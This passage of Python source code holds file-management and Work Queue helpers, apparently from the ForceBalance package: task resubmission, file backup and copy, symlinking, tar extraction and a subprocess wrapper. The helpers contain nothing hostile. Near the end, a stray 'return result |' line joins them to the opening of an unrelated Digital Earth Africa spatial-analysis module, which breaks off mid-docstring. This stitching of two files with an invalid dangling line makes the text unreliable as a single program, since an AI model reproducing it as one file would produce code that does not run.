        # print f[0], f[1]
        task.specify_output_file(f[0],f[1],cache=False)
    if tag is None: tag = command
    task.specify_tag(tag)
    # Stored on the task; wq_wait1 uses it as the reporting threshold.
    task.print_time = print_time
    taskid = wq.submit(task)
    if verbose:
        logger.info("Submitting command '%s' to the Work Queue, taskid %i\n" % (command, taskid))
    if tgt is not None:
        WQIDS[tgt.name].append(taskid)
    else:
        WQIDS["None"].append(taskid)
def wq_wait1(wq, wait_time=10, wait_intvl=1, print_time=60, verbose=False):
    """ This function waits ten seconds to see if a task in the Work Queue has finished.

    Polls wq.wait() every *wait_intvl* seconds for up to *wait_time* seconds.
    Failed tasks (nonzero result) are resubmitted to the same queue and re-keyed
    in WQIDS; successful tasks are removed from WQIDS, and those running longer
    than *print_time* seconds are reported.

    @param[in] wq The Work Queue object
    @param[in] wait_time Total number of seconds to wait
    @param[in] wait_intvl Polling interval in seconds (capped below by wait_time)
    @param[in] print_time Only report successful jobs lasting longer than this
    @param[in] verbose Log detailed per-task and queue statistics
    """
    global WQIDS
    if verbose: logger.info('---\n')
    if wait_intvl >= wait_time:
        wait_time = wait_intvl
        numwaits = 1
    else:
        numwaits = int(wait_time/wait_intvl)
    for sec in range(numwaits):
        task = wq.wait(wait_intvl)
        if task:
            exectime = task.cmd_execution_time/1000000
            if verbose:
                logger.info('A job has finished!\n')
                logger.info('Job name = ' + task.tag + 'command = ' + task.command + '\n')
                # Bug fix: these task fields are numeric, and "str + int"
                # raised TypeError; convert explicitly before concatenating.
                logger.info("status = " + str(task.status) + '\n')
                logger.info("return_status = " + str(task.return_status))
                logger.info("result = " + str(task.result))
                logger.info("host = " + task.hostname + '\n')
                logger.info("execution time = " + str(exectime))
                logger.info("total_bytes_transferred = " + str(task.total_bytes_transferred) + '\n')
            if task.result != 0:
                # Failed task: resubmit and record its new ID under the same target.
                oldid = task.id
                oldhost = task.hostname
                tgtname = "None"
                for tnm in WQIDS:
                    if task.id in WQIDS[tnm]:
                        tgtname = tnm
                        WQIDS[tnm].remove(task.id)
                taskid = wq.submit(task)
                logger.warning("Task '%s' (task %i) failed on host %s (%i seconds), resubmitted: taskid %i\n" % (task.tag, oldid, oldhost, exectime, taskid))
                WQIDS[tgtname].append(taskid)
            else:
                if hasattr(task, 'print_time'):
                    print_time = task.print_time
                if exectime > print_time: # Assume that we're only interested in printing jobs that last longer than a minute.
                    logger.info("Task '%s' (task %i) finished successfully on host %s (%i seconds)\n" % (task.tag, task.id, task.hostname, exectime))
                for tnm in WQIDS:
                    if task.id in WQIDS[tnm]:
                        WQIDS[tnm].remove(task.id)
                del task
        # LPW 2018-09-10 Updated to use stats fields from CCTools 6.2.10
        # Please upgrade CCTools version if errors are encountered during runtime.
        if verbose:
            logger.info("Workers: %i init, %i idle, %i busy, %i total joined, %i total removed\n" \
                % (wq.stats.workers_init, wq.stats.workers_idle, wq.stats.workers_busy, wq.stats.workers_joined, wq.stats.workers_removed))
            logger.info("Tasks: %i running, %i waiting, %i dispatched, %i submitted, %i total complete\n" \
                % (wq.stats.tasks_running, wq.stats.tasks_waiting, wq.stats.tasks_dispatched, wq.stats.tasks_submitted, wq.stats.tasks_done))
            logger.info("Data: %i / %i kb sent/received\n" % (int(wq.stats.bytes_sent/1024), int(wq.stats.bytes_received/1024)))
        else:
            logger.info("\r%s : %i/%i workers busy; %i/%i jobs complete \r" %\
                (time.ctime(), wq.stats.workers_busy, wq.stats.workers_connected, wq.stats.tasks_done, wq.stats.tasks_submitted))
            # Emit a real newline every 15 minutes so the status line isn't lost.
            if time.time() - wq_wait1.t0 > 900:
                wq_wait1.t0 = time.time()
                logger.info('\n')
wq_wait1.t0 = time.time()
def wq_wait(wq, wait_time=10, wait_intvl=10, print_time=60, verbose=False):
    """Block until the Work Queue has no tasks left.

    Repeatedly polls the queue via wq_wait1 until wq.empty() reports that
    every submitted task has been retrieved.
    """
    while not wq.empty():
        wq_wait1(wq, wait_time=wait_time, wait_intvl=wait_intvl,
                 print_time=print_time, verbose=verbose)
#=====================================#
#| File and process management stuff |#
#=====================================#
def click():
    """Stopwatch: return seconds elapsed since the previous call to click().

    The running timestamp is kept on the function attribute click.t0.
    """
    now = time.time()
    elapsed = now - click.t0
    click.t0 = now
    return elapsed
click.t0 = time.time()
def splitall(path):
    """Split a path into a list of all of its components.

    Example: '/a/b/c' -> ['/', 'a', 'b', 'c'] ; 'a/b' -> ['a', 'b'].
    """
    components = []
    while True:
        head, tail = os.path.split(path)
        if head == path:
            # Absolute-path sentinel: splitting the root returns itself.
            components.insert(0, head)
            break
        if tail == path:
            # Relative-path sentinel: a single bare component remains.
            components.insert(0, tail)
            break
        path = head
        components.insert(0, tail)
    return components
# Back up a file.
def bak(path, dest=None, cwd=None, start=1):
    """Back up a file by moving it to a numbered sibling (e.g. foo_1.txt).

    Parameters
    ----------
    path : str
        File to back up.  If it does not exist, nothing happens.
    dest : str, optional
        Destination folder for the backup (created if needed).  Defaults to
        the file's own directory.
    cwd : str, optional
        If provided, chdir there first; the original directory is restored
        even if an error occurs (the original code left the process stranded
        in `cwd` on exceptions).
    start : int, optional
        First numeric suffix to try.

    Returns
    -------
    str or None
        The backup file name, or None if `path` did not exist.
    """
    oldf = path
    newf = None
    if cwd is not None:
        if not os.path.exists(cwd):
            raise RuntimeError("%s is not an existing folder" % cwd)
        old_d = os.getcwd()
        os.chdir(cwd)
    try:
        if os.path.exists(path):
            dnm, fnm = os.path.split(path)
            if dnm == '':
                dnm = '.'
            base, ext = os.path.splitext(fnm)
            if dest is None:
                dest = dnm
            if not os.path.isdir(dest):
                os.makedirs(dest)
            # Find the first unused numeric suffix.
            i = start
            while True:
                fnm = "%s_%i%s" % (base, i, ext)
                newf = os.path.join(dest, fnm)
                if not os.path.exists(newf):
                    break
                i += 1
            logger.info("Backing up %s -> %s\n" % (oldf, newf))
            shutil.move(oldf, newf)
    finally:
        # Always restore the original working directory.
        if cwd is not None:
            os.chdir(old_d)
    return newf
# Purpose: Given a file name and/or an extension, do one of the following:
# 1) If provided a file name, check the file, crash if not exist and err==True. Return the file name.
# 2) If list is empty but extension is provided, check if one file exists that matches
# the extension. If so, return the file name.
# 3) If list is still empty and err==True, then crash with an error.
def onefile(fnm=None, ext=None, err=False):
    """Resolve a single input file, copying it into the current directory.

    Behavior (see the comment block above the function):
    1) Given a file name, verify it; crash if missing and err==True.
    2) Given only an extension, autodetect a unique '.ext' file in cwd.
    3) If nothing can be resolved and err==True, crash.

    Parameters
    ----------
    fnm : str, optional
        Candidate file name (may live outside the current directory).
    ext : str, optional
        Extension (without the dot) used for autodetection.
    err : bool, optional
        If True, raise RuntimeError instead of warning on failure.

    Returns
    -------
    str or None
        Base name of the resolved file (now present in cwd), or None.

    Side effects: may copy `fnm` into the current directory; logs warnings
    via warn_once / logger.
    """
    if fnm is None and ext is None:
        if err:
            logger.error("Must provide either filename or extension to onefile()")
            raise RuntimeError
        else:
            return None
    if fnm is not None:
        if os.path.exists(fnm):
            # File exists but lives elsewhere: bring a copy into cwd.
            if os.path.dirname(os.path.abspath(fnm)) != os.getcwd():
                fsrc = os.path.abspath(fnm)
                fdest = os.path.join(os.getcwd(), os.path.basename(fnm))
                #-----
                # If the file path doesn't correspond to the current directory, copy the file over
                # If the file exists in the current directory already and it's different, then crash.
                #-----
                if os.path.exists(fdest):
                    if not filecmp.cmp(fsrc, fdest):
                        logger.error("onefile() will not overwrite %s with %s\n" % (os.path.join(os.getcwd(), os.path.basename(fnm)),os.path.abspath(fnm)))
                        raise RuntimeError
                    else:
                        logger.info("\x1b[93monefile() says the files %s and %s are identical\x1b[0m\n" % (os.path.abspath(fnm), os.getcwd()))
                else:
                    logger.info("\x1b[93monefile() will copy %s to %s\x1b[0m\n" % (os.path.abspath(fnm), os.getcwd()))
                    shutil.copy2(fsrc, fdest)
            return os.path.basename(fnm)
        elif err==True or ext is None:
            # Explicit file name was required but missing.
            logger.error("File specified by %s does not exist!" % fnm)
            raise RuntimeError
        elif ext is not None:
            # Fall through to extension-based autodetection below.
            warn_once("File specified by %s does not exist - will try to autodetect .%s extension" % (fnm, ext))
    # Autodetect: exactly one file in cwd with the requested extension.
    answer = None
    cwd = os.getcwd()
    ls = [i for i in os.listdir(cwd) if i.endswith('.%s' % ext)]
    if len(ls) != 1:
        if err:
            logger.error("Cannot find a unique file with extension .%s in %s (%i found; %s)" % (ext, cwd, len(ls), ' '.join(ls)))
            raise RuntimeError
        else:
            warn_once("Cannot find a unique file with extension .%s in %s (%i found; %s)" %
                      (ext, cwd, len(ls), ' '.join(ls)), warnhash = "Found %i .%s files" % (len(ls), ext))
    else:
        answer = os.path.basename(ls[0])
        warn_once("Autodetected %s in %s" % (answer, cwd), warnhash = "Autodetected %s" % answer)
    return answer
# Purpose: Given a file name / file list and/or an extension, do one of the following:
# 1) If provided a file list, check each file in the list
# and crash if any file does not exist. Return the list.
# 2) If provided a file name, check the file and crash if the file
# does not exist. Return a length-one list with the file name.
# 3) If list is empty but extension is provided, check for files that
# match the extension. If so, append them to the list.
# 4) If list is still empty and err==True, then crash with an error.
def listfiles(fnms=None, ext=None, err=False, dnm=None):
    """Resolve a list of input files, copying them into the current directory.

    1) Given a list, verify every entry (crash on a missing one); return it.
    2) Given a single name, verify it; return a one-element list.
    3) If empty but `ext` is given, collect files matching the extension.
    4) If still empty and err==True, crash.
    Files living outside cwd are copied in; an existing, *different* file of
    the same name in cwd is a fatal error.

    Parameters
    ----------
    fnms : list or str or None
        File name(s) to check.
    ext : str, optional
        Extension used to autodetect files when `fnms` yields nothing.
    err : bool, optional
        Raise RuntimeError if no files can be found.
    dnm : str, optional
        Directory to search in (restored to the original cwd on return).

    Returns
    -------
    list of str
        Base names of the resolved files.
    """
    answer = []
    cwd = os.path.abspath(os.getcwd())
    if dnm is not None:
        os.chdir(dnm)
    if isinstance(fnms, list):
        for i in fnms:
            if not os.path.exists(i):
                logger.error('Specified %s but it does not exist' % i)
                raise RuntimeError
            answer.append(i)
    elif isinstance(fnms, six.string_types):
        if not os.path.exists(fnms):
            logger.error('Specified %s but it does not exist' % fnms)
            raise RuntimeError
        answer = [fnms]
    elif fnms is not None:
        logger.info(str(fnms))
        logger.error('First argument to listfiles must be a list, a string, or None')
        raise RuntimeError
    if answer == [] and ext is not None:
        answer = [os.path.basename(i) for i in os.listdir(os.getcwd()) if i.endswith('.%s' % ext)]
    if answer == [] and err:
        logger.error('listfiles function failed to come up with a file! (fnms = %s ext = %s)' % (str(fnms), str(ext)))
        raise RuntimeError
    for ifnm, fnm in enumerate(answer):
        if os.path.dirname(os.path.abspath(fnm)) != os.getcwd():
            fsrc = os.path.abspath(fnm)
            fdest = os.path.join(os.getcwd(), os.path.basename(fnm))
            #-----
            # If the file path doesn't correspond to the current directory, copy the file over
            # If the file exists in the current directory already and it's different, then crash.
            #-----
            if os.path.exists(fdest):
                if not filecmp.cmp(fsrc, fdest):
                    # Bug fix: these three messages previously said "onefile()",
                    # a copy-paste leftover from that function.
                    logger.error("listfiles() will not overwrite %s with %s\n" % (os.path.join(os.getcwd(), os.path.basename(fnm)), os.path.abspath(fnm)))
                    raise RuntimeError
                else:
                    logger.info("\x1b[93mlistfiles() says the files %s and %s are identical\x1b[0m\n" % (os.path.abspath(fnm), os.getcwd()))
                    answer[ifnm] = os.path.basename(fnm)
            else:
                logger.info("\x1b[93mlistfiles() will copy %s to %s\x1b[0m\n" % (os.path.abspath(fnm), os.getcwd()))
                shutil.copy2(fsrc, fdest)
                answer[ifnm] = os.path.basename(fnm)
    os.chdir(cwd)
    return answer
def extract_tar(tarfnm, fnms, force=False):
    """
    Extract a list of files from .tar archive with any compression.
    The file is extracted to the base folder of the archive.

    Parameters
    ----------
    tarfnm :
        Name of the archive file.
    fnms : str or list
        File names to be extracted.
    force : bool, optional
        If true, then force extraction of file even if they already exist on disk.

    Silently does nothing when the archive is missing or invalid, or when
    every requested file already exists (unless force=True).
    """
    # Get path of tar file.
    fdir = os.path.abspath(os.path.dirname(tarfnm))
    # If all files exist, then return - no need to extract.
    if (not force) and all(os.path.exists(os.path.join(fdir, f)) for f in fnms):
        return
    # If the tar file doesn't exist or isn't valid, do nothing.
    if not os.path.exists(tarfnm):
        return
    if not tarfile.is_tarfile(tarfnm):
        return
    # Accept a single file name as well as a list of names.
    if isinstance(fnms, six.string_types):
        fnms = [fnms]
    # Use a context manager so the archive is always closed (the original
    # opened the archive and never called close(), leaking the handle).
    with tarfile.open(tarfnm, 'r') as arch:
        # Extract only the members that are actually present, to avoid an
        # exception for names missing from the archive.
        members = [m for m in arch.getmembers() if m.name in fnms]
        arch.extractall(fdir, members=members)
def GoInto(Dir):
    """Change into directory `Dir`, creating it (and parents) if needed.

    Raises RuntimeError if `Dir` exists but is not a directory.
    """
    if os.path.exists(Dir):
        if os.path.isdir(Dir):
            pass
        else:
            # Bug fix: the original referenced the undefined name `newdir`
            # here, which raised NameError instead of the intended message.
            logger.error("Tried to create directory %s, it exists but isn't a directory\n" % Dir)
            raise RuntimeError
    else:
        os.makedirs(Dir)
    os.chdir(Dir)
def allsplit(Dir):
    """Recursively split a directory path into its component directories.

    Example: 'a/b/c' -> ['a', 'b', 'c'].  Empty and '.' components are
    dropped, so allsplit('') == [].
    """
    head, tail = os.path.split(os.path.normpath(Dir))
    if tail in ('', '.'):
        return []
    return allsplit(head) + [tail]
def Leave(Dir):
    """Leave a directory previously entered with GoInto.

    Sanity-checks that the current directory's base name matches `Dir`,
    then walks back up one level per path component of `Dir`.
    """
    here = os.path.split(os.getcwd())[1]
    if here != Dir:
        logger.error("Trying to leave directory %s, but we're actually in directory %s (check your code)\n" % (Dir, here))
        raise RuntimeError
    for _ in allsplit(Dir):
        os.chdir('..')
# Dictionary containing specific error messages for specific missing files or file patterns
specific_lst = [(['mdrun','grompp','trjconv','g_energy','g_traj'], "Make sure to install GROMACS and add it to your path (or set the gmxpath option)"),
                (['force.mdin', 'stage.leap'], "This file is needed for setting up AMBER force matching targets"),
                (['conf.pdb', 'mono.pdb'], "This file is needed for setting up OpenMM condensed phase property targets"),
                (['liquid.xyz', 'liquid.key', 'mono.xyz', 'mono.key'], "This file is needed for setting up OpenMM condensed phase property targets"),
                (['dynamic', 'analyze', 'minimize', 'testgrad', 'vibrate', 'optimize', 'polarize', 'superpose'], "Make sure to install TINKER and add it to your path (or set the tinkerpath option)"),
                (['runcuda.sh', 'npt.py', 'npt_tinker.py'], "This file belongs in the ForceBalance source directory, not sure why it is missing"),
                (['input.xyz'], "This file is needed for TINKER molecular property targets"),
                (['.*key$', '.*xyz$'], "I am guessing this file is probably needed by TINKER"),
                (['.*gro$', '.*top$', '.*itp$', '.*mdp$', '.*ndx$'], "I am guessing this file is probably needed by GROMACS")
                ]
# Flatten the (patterns, message) pairs into one pattern -> message mapping.
# (Replaces the original itertools.chain/nested-list construction.)
specific_dct = {key: msg for keys, msg in specific_lst for key in keys}
def MissingFileInspection(fnm):
    """Return a newline-prefixed hint string for a missing file, or "".

    Matches the file's base name against the patterns in specific_dct
    (re.match, so patterns are anchored at the start) and concatenates
    every matching message, one per line.

    Bug fix: the original added the leading "\\n" unconditionally on the
    first loop iteration, so it returned "\\n" even when nothing matched;
    now the prefix is only added when at least one pattern matches.
    """
    fnm = os.path.split(fnm)[1]
    answer = ""
    for key in specific_dct:
        if re.match(key, fnm):
            if answer == "":
                answer += "\n"
            answer += "%s\n" % specific_dct[key]
    return answer
def wopen(dest, binary=False):
    """Open `dest` for writing; if it is a symbolic link, remove the link
    first so we write a real file instead of following the link."""
    if os.path.islink(dest):
        logger.warning("Trying to write to a symbolic link %s, removing it first\n" % dest)
        os.unlink(dest)
    mode = 'wb' if binary else 'w'
    return open(dest, mode)
def LinkFile(src, dest, nosrcok = False):
    """Create a symbolic link `dest` pointing at `src`.

    Behavior:
    - No-op if src and dest resolve to the same path.
    - Replaces a broken symlink at dest; leaves a valid symlink untouched.
    - Raises RuntimeError if dest exists and is a regular file/directory.
    - Raises RuntimeError if src is missing, unless nosrcok=True.
    """
    # Linking a path onto itself is a silent no-op.
    if os.path.abspath(src) == os.path.abspath(dest): return
    if os.path.exists(src):
        # Remove broken link
        # (islink is True but exists is False when the link target is gone)
        if os.path.islink(dest) and not os.path.exists(dest):
            os.remove(dest)
            os.symlink(src, dest)
        elif os.path.exists(dest):
            # A valid symlink already in place is accepted as-is; anything
            # else at dest is an error.
            if os.path.islink(dest): pass
            else:
                logger.error("Tried to create symbolic link %s to %s, destination exists but isn't a symbolic link\n" % (src, dest))
                raise RuntimeError
        else:
            os.symlink(src, dest)
    else:
        if not nosrcok:
            logger.error("Tried to create symbolic link %s to %s, but source file doesn't exist%s\n" % (src,dest,MissingFileInspection(src)))
            raise RuntimeError
def CopyFile(src, dest):
    """Copy `src` to `dest` with metadata (shutil.copy2).

    Notes on behavior (preserved from the original):
    - If `dest` already exists as a regular file, the copy is silently
      skipped (existing destinations are never overwritten).
    - If `dest` exists and is a symbolic link, raise RuntimeError.
    - If `src` does not exist, raise RuntimeError.
    """
    if not os.path.exists(src):
        logger.error("Tried to copy %s to %s, but source file doesn't exist%s\n" % (src,dest,MissingFileInspection(src)))
        raise RuntimeError
    if os.path.exists(dest):
        if os.path.islink(dest):
            logger.error("Tried to copy %s to %s, destination exists but it's a symbolic link\n" % (src, dest))
            raise RuntimeError
    else:
        shutil.copy2(src, dest)
def link_dir_contents(abssrcdir, absdestdir):
    """Symlink each file in `abssrcdir` into `absdestdir`.

    Broken symlinks already present in the destination are removed first.
    Regular files are linked; directories are skipped, except one named
    'IC' which is linked as a whole.  Existing destination entries are
    left untouched.
    """
    for entry in os.listdir(abssrcdir):
        src_path = os.path.join(abssrcdir, entry)
        dest_path = os.path.join(absdestdir, entry)
        # Clear out a stale (broken) symlink so it can be recreated.
        if os.path.islink(dest_path) and not os.path.exists(dest_path):
            os.remove(dest_path)
        want_link = os.path.isfile(src_path) or (os.path.isdir(src_path) and entry == 'IC')
        if want_link and not os.path.exists(dest_path):
            os.symlink(src_path, dest_path)
def remove_if_exists(fnm):
    """ Remove the file if it exists (doesn't return an error).

    Uses EAFP (try/except) instead of the original exists-then-remove,
    which had a check-to-use race: the file could disappear between the
    os.path.exists() test and os.remove().  Errors other than
    "file not found" (e.g. permission denied) are still raised.
    """
    import errno
    try:
        os.remove(fnm)
    except OSError as e:
        if e.errno != errno.ENOENT:
            raise
def which(fnm):
    """Return the directory containing executable `fnm`, or '' if not found.

    Works only on UNIX-like systems (shells out to `which`).  The original
    used a bare `except:`, which also swallowed KeyboardInterrupt and
    SystemExit; only the expected failures are caught now.
    """
    try:
        lines = os.popen('which %s 2> /dev/null' % fnm).readlines()
        # IndexError here means `which` printed nothing: not found.
        return os.path.split(lines[0].strip())[0]
    except (IndexError, OSError):
        return ''
def copy_tree_over(src, dest):
    """
    Copy a source directory tree to a destination directory tree,
    overwriting files as necessary. This does not require removing
    the destination folder, which can reduce the number of times
    shutil.rmtree needs to be called.

    NOTE(review): relies on the private distutils.dir_util._path_created
    cache; distutils is deprecated/removed in Python 3.12+ — confirm the
    supported interpreter range.
    """
    # From https://stackoverflow.com/questions/9160227/dir-util-copy-tree-fails-after-shutil-rmtree/28055993 :
    # If you copy folder, then remove it, then copy again it will fail, because it caches all the created dirs.
    # To workaround you can clear _path_created before copy:
    distutils.dir_util._path_created = {}
    distutils.dir_util.copy_tree(src, dest)
# Thanks to cesarkawakami on #python (IRC freenode) for this code.
class LineChunker(object):
    """Buffer incoming bytes and emit complete lines to a callback.

    Bytes pushed via push() are UTF-8 decoded and accumulated; every time
    a newline or carriage return completes a line, the line (terminator
    included) is passed to `callback`.  close() flushes any remaining
    partial line with a trailing newline.  Usable as a context manager.
    """
    def __init__(self, callback):
        self.callback = callback
        self.buf = ""

    def push(self, data):
        # Incoming stream data is bytes under Py3; decode before buffering.
        # Callers retry on UnicodeDecodeError when a multi-byte character
        # straddles a read boundary.
        self.buf += data.decode('utf-8')
        self.nomnom()

    def close(self):
        # Flush a trailing partial line, terminated with a newline.
        if self.buf:
            self.callback(self.buf + "\n")

    def nomnom(self):
        # Emit every complete line ending in \r or \n currently buffered.
        pieces = re.split(r"(\r|\n)", self.buf, maxsplit=1)
        while len(pieces) == 3:
            line, terminator, self.buf = pieces
            self.callback(line + terminator)
            pieces = re.split(r"(\r|\n)", self.buf, maxsplit=1)

    def __enter__(self):
        return self

    def __exit__(self, *args, **kwargs):
        self.close()
def _exec(command, print_to_screen = False, outfnm = None, logfnm = None, stdin = "", print_command = True, copy_stdout = True, copy_stderr = False, persist = False, expand_cr=False, print_error=True, rbytes=1, cwd=None, **kwargs):
    """Runs command line using subprocess, optionally returning stdout.
    Options:
    command (required) = Name of the command you want to execute
    outfnm (optional) = Name of the output file name (overwritten if exists)
    logfnm (optional) = Name of the log file name (appended if exists)
    stdin (optional) = A string to be passed to stdin, as if it were typed (use newline character to mimic Enter key)
    print_command = Whether to print the command.
    copy_stdout = Copy the stdout stream; can set to False in strange situations
    copy_stderr = Copy the stderr stream to the stdout stream; useful for GROMACS which prints out everything to stderr (argh.)
    expand_cr = Whether to expand carriage returns into newlines (useful for GROMACS mdrun).
    print_error = Whether to print error messages on a crash. Should be true most of the time.
    persist = Continue execution even if the command gives a nonzero return code.
    rbytes = Number of bytes to read from stdout and stderr streams at a time. GMX requires rbytes = 1 otherwise streams are interleaved. Higher values for speed.

    Returns the process stdout as a list of lines (a trailing empty line is
    dropped).  The exit code of the most recent call is stored on the
    function attribute `_exec.returncode`.  Raises RuntimeError on a
    nonzero exit code unless persist=True.
    """
    # Dictionary of options to be passed to the Popen object.
    cmd_options={'shell':isinstance(command, six.string_types), 'stdin':PIPE, 'stdout':PIPE, 'stderr':PIPE, 'universal_newlines':expand_cr, 'cwd':cwd}
    # If the current working directory is provided, the outputs will be written to there as well.
    if cwd is not None:
        if outfnm is not None:
            outfnm = os.path.abspath(os.path.join(cwd, outfnm))
        if logfnm is not None:
            logfnm = os.path.abspath(os.path.join(cwd, logfnm))
    # "write to file" : Function for writing some characters to the log and/or output files.
    def wtf(out):
        if logfnm is not None:
            # Log file is always appended to.
            with open(logfnm,'ab+') as f:
                f.write(out.encode('utf-8'))
                f.flush()
        if outfnm is not None:
            # Output file is truncated on the first write of this call
            # (tracked by the wtf.first flag), then appended to.
            with open(outfnm,'wb+' if wtf.first else 'ab+') as f:
                f.write(out.encode('utf-8'))
                f.flush()
        wtf.first = False
    wtf.first = True
    # Preserve backwards compatibility; sometimes None gets passed to stdin.
    if stdin is None: stdin = ""
    if print_command:
        logger.info("Executing process: \x1b[92m%-50s\x1b[0m%s%s%s%s\n" % (' '.join(command) if type(command) is list else command,
                                                                          " In: %s" % cwd if cwd is not None else "",
                                                                          " Output: %s" % outfnm if outfnm is not None else "",
                                                                          " Append: %s" % logfnm if logfnm is not None else "",
                                                                          (" Stdin: %s" % stdin.replace('\n','\\n')) if stdin else ""))
        wtf("Executing process: %s%s\n" % (command, (" Stdin: %s" % stdin.replace('\n','\\n')) if stdin else ""))
    cmd_options.update(kwargs)
    p = subprocess.Popen(command, **cmd_options)
    # Write the stdin stream to the process.
    p.stdin.write(stdin.encode('ascii'))
    p.stdin.close()
    #===============================================================#
    #| Read the output streams from the process. This is a bit |#
    #| complicated because programs like GROMACS tend to print out |#
    #| stdout as well as stderr streams, and also carriage returns |#
    #| along with newline characters. |#
    #===============================================================#
    # stdout and stderr streams of the process.
    streams = [p.stdout, p.stderr]
    # Are we using Python 2?
    p2 = sys.version_info.major == 2
    # These are functions that take chunks of lines (read) as inputs.
    def process_out(read):
        if print_to_screen:
            # LPW 2019-11-25: We should be writing a string, not a representation of bytes
            if p2:
                sys.stdout.write(str(read.encode('utf-8')))
            else:
                sys.stdout.write(read)
        if copy_stdout:
            process_out.stdout.append(read)
            wtf(read)
    process_out.stdout = []
    def process_err(read):
        if print_to_screen:
            if p2:
                sys.stderr.write(str(read.encode('utf-8')))
            else:
                sys.stderr.write(read)
        # stderr is always collected; copy_stderr additionally merges it
        # into the stdout record (and the log/output files).
        process_err.stderr.append(read)
        if copy_stderr:
            process_out.stdout.append(read)
            wtf(read)
    process_err.stderr = []
    # This reads the streams one byte at a time, and passes it to the LineChunker
    # which splits it by either newline or carriage return.
    # If the stream has ended, then it is removed from the list.
    with LineChunker(process_out) as out_chunker, LineChunker(process_err) as err_chunker:
        while True:
            to_read, _, _ = select(streams, [], [])
            for fh in to_read:
                # We want to call fh.read below, but this can lead to a system hang when executing Tinker on mac.
                # This hang can be avoided by running fh.read1 (with a "1" at the end), however python2.7
                # doesn't implement ByteStream.read1. So, to enable python3 builds on mac to work, we pick the "best"
                # fh.read function we can get
                if hasattr(fh, 'read1'):
                    fhread = fh.read1
                else:
                    fhread = fh.read
                if fh is p.stdout:
                    # Accumulate bytes until they decode cleanly as UTF-8
                    # (a multi-byte character can straddle a read boundary);
                    # give up after 10+rbytes bytes.
                    read_nbytes = 0
                    read = ''.encode('utf-8')
                    while True:
                        if read_nbytes == 0:
                            read += fhread(rbytes)
                            read_nbytes += rbytes
                        else:
                            read += fhread(1)
                            read_nbytes += 1
                        if read_nbytes > 10+rbytes:
                            raise RuntimeError("Failed to decode stdout from external process.")
                        if not read:
                            # Empty read: stream closed; stop watching it.
                            streams.remove(p.stdout)
                            p.stdout.close()
                            break
                        else:
                            try:
                                out_chunker.push(read)
                                break
                            except UnicodeDecodeError:
                                pass
                elif fh is p.stderr:
                    # Same decode-retry loop as stdout above, for stderr.
                    read_nbytes = 0
                    read = ''.encode('utf-8')
                    while True:
                        if read_nbytes == 0:
                            read += fhread(rbytes)
                            read_nbytes += rbytes
                        else:
                            read += fhread(1)
                            read_nbytes += 1
                        if read_nbytes > 10+rbytes:
                            raise RuntimeError("Failed to decode stderr from external process.")
                        if not read:
                            streams.remove(p.stderr)
                            p.stderr.close()
                            break
                        else:
                            try:
                                err_chunker.push(read)
                                break
                            except UnicodeDecodeError:
                                pass
                else:
                    raise RuntimeError
            if len(streams) == 0: break
    p.wait()
    # Collapse the collected chunks into single strings.
    process_out.stdout = ''.join(process_out.stdout)
    process_err.stderr = ''.join(process_err.stderr)
    _exec.returncode = p.returncode
    if p.returncode != 0:
        if process_err.stderr and print_error:
            logger.warning("Received an error message:\n")
            logger.warning("\n[====] \x1b[91mError Message\x1b[0m [====]\n")
            logger.warning(process_err.stderr)
            logger.warning("[====] \x1b[91mEnd o'Message\x1b[0m [====]\n")
        if persist:
            if print_error:
                logger.info("%s gave a return code of %i (it may have crashed) -- carrying on\n" % (command, p.returncode))
        else:
            # This code (commented out) would not throw an exception, but instead exit with the returncode of the crashed program.
            # sys.stderr.write("\x1b[1;94m%s\x1b[0m gave a return code of %i (\x1b[91mit may have crashed\x1b[0m)\n" % (command, p.returncode))
            # sys.exit(p.returncode)
            logger.error("\x1b[1;94m%s\x1b[0m gave a return code of %i (\x1b[91mit may have crashed\x1b[0m)\n\n" % (command, p.returncode))
            raise RuntimeError
    # Return the output in the form of a list of lines, so we can loop over it using "for line in output".
    Out = process_out.stdout.split('\n')
    if Out[-1] == '':
        Out = Out[:-1]
    return Out
_exec.returncode = None
def warn_press_key(warning, timeout=10):
    """Log a warning; in an interactive session, pause until the user
    presses Enter or `timeout` seconds elapse, whichever comes first."""
    logger.warning(warning + '\n')
    if not sys.stdin.isatty():
        # Non-interactive (e.g. batch job): warn and carry on immediately.
        return
    logger.warning("\x1b[1;91mPress Enter or wait %i seconds (I assume no responsibility for what happens after this!)\x1b[0m\n" % timeout)
    try:
        ready, _, _ = select([sys.stdin], [], [], timeout)
        if ready:
            sys.stdin.readline()
    except: pass
def warn_once(warning, warnhash = None):
    """ Prints a warning but will only do so once in a given run.

    Parameters
    ----------
    warning : str or list of str
        Message (or list of message lines) to log.
    warnhash : hashable, optional
        Deduplication key; defaults to the warning itself.
    """
    if warnhash is None:
        warnhash = warning
    if warnhash in warn_once.already:
        return
    warn_once.already.add(warnhash)
    # Idiom fix: use isinstance() instead of `type(x) is ...` so subclasses
    # of str/list are also handled.
    if isinstance(warning, str):
        logger.info(warning + '\n')
    elif isinstance(warning, list):
        for line in warning:
            logger.info(line + '\n')
# Set of hashes already emitted during this run.
warn_once.already = set()
#=========================================#
#| Development stuff (not commonly used) |#
#=========================================#
def concurrent_map(func, data):
    """
    Similar to the bultin function map(). But spawn a thread for each argument
    and apply `func` concurrently.

    Note: unlike map(), we cannot take an iterable argument. `data` should be an
    indexable sequence.
    """
    results = [None] * len(data)

    def worker(idx):
        # Each thread writes its answer into its own slot, so no locking
        # is required.
        results[idx] = func(data[idx])

    workers = [threading.Thread(target=worker, args=(idx,)) for idx in range(len(data))]
    for w in workers:
        w.start()
    for w in workers:
        w.join()
    return results
return result |
spatial.py | '''
Spatial analyses functions for Digital Earth Africa data.
'''
# Import required packages
import fiona
import collections
import numpy as np
import xarray as xr
from osgeo import osr
from osgeo import ogr
import geopandas as gpd
import rasterio.features
import scipy.interpolate
import multiprocessing as mp
from scipy import ndimage as nd
from skimage.measure import label
from rasterstats import zonal_stats
from skimage.measure import find_contours
from geopy.geocoders import Nominatim
from shapely.geometry import mapping, shape
from datacube.utils.cog import write_cog
from datacube.helpers import write_geotiff
from datacube.utils.geometry import assign_crs
from datacube.utils.geometry import CRS, Geometry
from shapely.geometry import LineString, MultiLineString, shape
def xr_vectorize(da,
                 attribute_col='attribute',
                 transform=None,
                 crs=None,
                 dtype='float32',
                 export_shp=False,
                 verbose=False,
                 **rasterio_kwargs):
    """
    Vectorises a xarray.DataArray into a geopandas.GeoDataFrame.

    Parameters
    ----------
    da : xarray dataarray or a numpy ndarray
    attribute_col : str, optional
        Name of the attribute column in the resulting geodataframe.
        Values of the raster object converted to polygons will be
